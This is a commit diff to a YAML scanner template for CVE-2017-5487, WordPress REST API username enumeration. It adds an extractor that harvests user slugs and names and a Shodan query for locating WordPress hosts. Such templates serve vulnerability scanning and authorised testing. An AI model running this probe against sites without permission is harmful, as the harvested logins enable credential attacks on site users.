Merge pull request #4491 from dr0pd34d/patch-1

Added extractor for wordpress login names
2022-05-27 09:20:34 +05:30 · 2022-05-27 09:20:34 +05:30 · dab6624931
parent 302f03b5b3 2599ee1e15
commit dab6624931
1 changed files with 21 additions and 11 deletions
--- a/cves/2017/CVE-2017-5487.yaml
+++ b/cves/2017/CVE-2017-5487.yaml
@ -2,7 +2,7 @@ id: CVE-2017-5487

 info:
  name: WordPress Core < 4.7.1 - Username Enumeration
-  author: Manas_Harsh,daffainfo,geeknik
+  author: Manas_Harsh,daffainfo,geeknik,dr0pd34d
  severity: medium
  description: WordPress Core < 4.7.1 is susceptible to user enumeration because it does not properly restrict listings of post authors via wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API, which allows remote attackers to obtain sensitive information via a wp-json/wp/v2/users request.
  reference:
@ -15,32 +15,42 @@ info:
    cvss-score: 5.3
    cve-id: CVE-2017-5487
    cwe-id: CWE-200
-  tags: cve,cve2017,wordpress
+  metadata:
+    verified: true
+    shodan-query: http.component:"WordPress"
+  tags: cve,cve2017,wordpress,wp

 requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/wp/v2/users/"
      - "{{BaseURL}}/?rest_route=/wp/v2/users/"
+
    stop-at-first-match: true
    matchers-condition: and
    matchers:
-      - type: status
-        status:
-          - 200
-      - type: word
-        part: header
-        words:
-          - "application/json"
+
      - type: word
+        part: body
        words:
          - '"id":'
          - '"name":'
          - '"avatar_urls":'
        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200
+
    extractors:
      - type: json
+        part: body
+        name: "usernames"
        json:
+          - '.[] | .slug'
          - '.[].name'
-
-# Enahnced by mp 03/31/2022